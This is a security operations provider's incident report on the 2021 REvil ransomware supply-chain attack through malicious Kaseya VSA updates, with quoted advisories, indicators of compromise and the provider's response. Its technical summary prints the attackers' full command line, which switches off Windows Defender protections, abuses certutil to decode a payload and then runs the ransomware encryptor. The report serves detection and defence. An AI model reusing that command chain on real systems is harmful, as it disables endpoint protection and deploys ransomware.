REvil Ransomware Executes Supply Chain Attack via Malicious Kaseya Update
Incident Report for CyFlare
Resolved
REvil Ransomware Executes Supply Chain Attack via Malicious Kaseya Update

Posted Date: 07/02/2021

Published Date: 07/02/2021

Source: Kaseya

Sector: Information Technology & Information Security

DATE(S) ISSUED: 07/02/2021

SUBJECT: Supply Chain Attack – Malicious Kaseya Update Executing Malware by REvil Group

OVERVIEW:
“The REvil ransomware gang appears to have gained access to the infrastructure of Kaseya, a provider of remote management solutions, and is using a malicious update for the VSA software to deploy ransomware to companies across the world.

The incident first came to light earlier today in a Reddit section dedicated to managed service providers (MSPs), companies that provide remote IT services to smaller businesses lacking an IT department and which are usually Kaseya’s primary customers.

MSPs use Kaseya’s VSA platform to manage and deploy software updates to customer networks or access remote systems to troubleshoot a customer’s IT problems; however, this very same functionality can be abused by threat actors who manage to gain access to an MSP’s VSA platform.

While at the time of writing, it is unclear how widespread the incident is, security firm Huntress Labs is reporting that at least four MSPs have been hit so far. However, VSA is also used by regular businesses to manage large computer fleets, meaning the incident is also most likely impacting non-MSP entities as well.

According to security firm Sophos, which has also detected the attack via its antivirus telemetry, victims appear to be getting infected with ransomware via a malicious update to Kaseya VSA on-prem servers that disables local antivirus solutions and then deploys a fake Windows Defender app that encrypts local files.”

References:
https://www.msspalert.com/cybersecurity-breaches-and-attacks/kaseya-rmm-cyberattack-warning/
https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/
https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/
https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689


THREAT INTELLIGENCE:
“We are tracking 8 MSPs where this has happened and working in close collaboration with two of them. Although all four are running Kaseya VSA, we have not validated that VSA is being exploited (not fair at this time to say "Kaseya has been hacked" without evidence.”

Kaseya's official recommendation is to: "IMMEDIATELY shutdown your VSA server until you receive further notice from us.

We are experiencing a potential attack against the VSA that has been limited to a small number of on-premise customers only as of 2:00 PM EDT today. We are in the process of investigating the root cause of the incident with an abundance of caution, but we recommend that you IMMEDIATELY shutdown your VSA server until you receive further notice from us. Its critical that you do this immediately, because one of the first things the attacker does is shutoff administrative access to the VSA.”

SYSTEMS AFFECTED: Kaseya VSA Servers - Windows

RISK:
Managed Service Providers (MSPs) or companies that provide remote IT services to other companies or access to remote systems are affected by this threat.

Kaseya VSA is also used by regular businesses that are sized medium and large. Meaning this attack is not limited to MSPs only, but non-MSP entities as well.

TECHNICAL SUMMARY:
Here's validated indicators of compromise known at this time:
Ransomware encryptor is dropped to c:\kworking\agent.exe
The VSA procedure is named "Kaseya VSA Agent Hot-fix”
At least two tasks run the following: "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

Other possible Indicators of Compromise (IOCs) identified:
VirusTotal
MD5
561cffbaba71a6e8cc1cdceda990ead4
SHA-1
5162f14d75e96edb914d1756349d6e11583db0b0
SHA-256
d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
Vhash
095056655d15656az47!z
Authentihash
c9d30e7bf92c0bb67331c3526580a45d8446c785e4c671f55c957f53b285158f
Imphash
59349b1648eddf021c01f05a17a0e870
Rich PE header hash
60c050aad9e163c9893ac438cc74b2bf
SSDEEP
24576:vMz7ETDWX4XukZeVL/kYx9P/JY6gfjcsAE:kfF7k4pB/JYPIsAE
TLSH
T1D915BF03F6C199B2F5DF013960B2577E8D3AAE158729D9D39B9038668D312D06B3F389
File type
Win32 EXE
Magic
PE32 executable for MS Windows (GUI) Intel 80386 32-bit
TrID
Windows Control Panel Item (generic) (88.3%)
TrID
Win64 Executable (generic) (4.7%)
TrID
Win16 NE executable (generic) (2.2%)
TrID
Win32 Executable (generic) (2%)
TrID
OS/2 Executable (generic) (0.9%)
File size
890.88 KB (912264 bytes)

ACTIONS TAKEN:
The CyFlare SOC is closely monitoring the situation as updates continue to arise from Kaseya and the public. We also have word from one of our affected customers that Kaseya, as a precaution, shut down the entire SaaS architecture so they can examine everyone’s instances to be sure this is isolated to on-prem folks.

At this time, we do not believe any of our customers utilizing Kaseya is compromised at this time. This conclusion is the result of threat hunting searches performed looking for the indicators of compromise listed above into each affected customer’s environment/security solutions CyFlare manages.

For our managed endpoint or SentinelOne MDR customers we have also implemented a global blacklist on one key IOC identified. We added the SHA1 Hash identified as the Kaseya VSA Ransomware Encryptor Hash to the blacklist.

As more details for this emerging threat arise through the Cyber community or through Kaseya notices, your SOC will continue to address. If there any further updates, or indication that one of our affected customers are compromise then we will engage you further immediately.

If you have any further questions, comments, or concerns regarding this threat then please do not hesitate in contacting your SOC at CyFlare. The SOC can be reached via email, ticket, or phone call to our support center.

Thank you for your cooperation
Posted Jul 02, 2021 - 20:12 EDT
This incident affected: Breach Detection Service.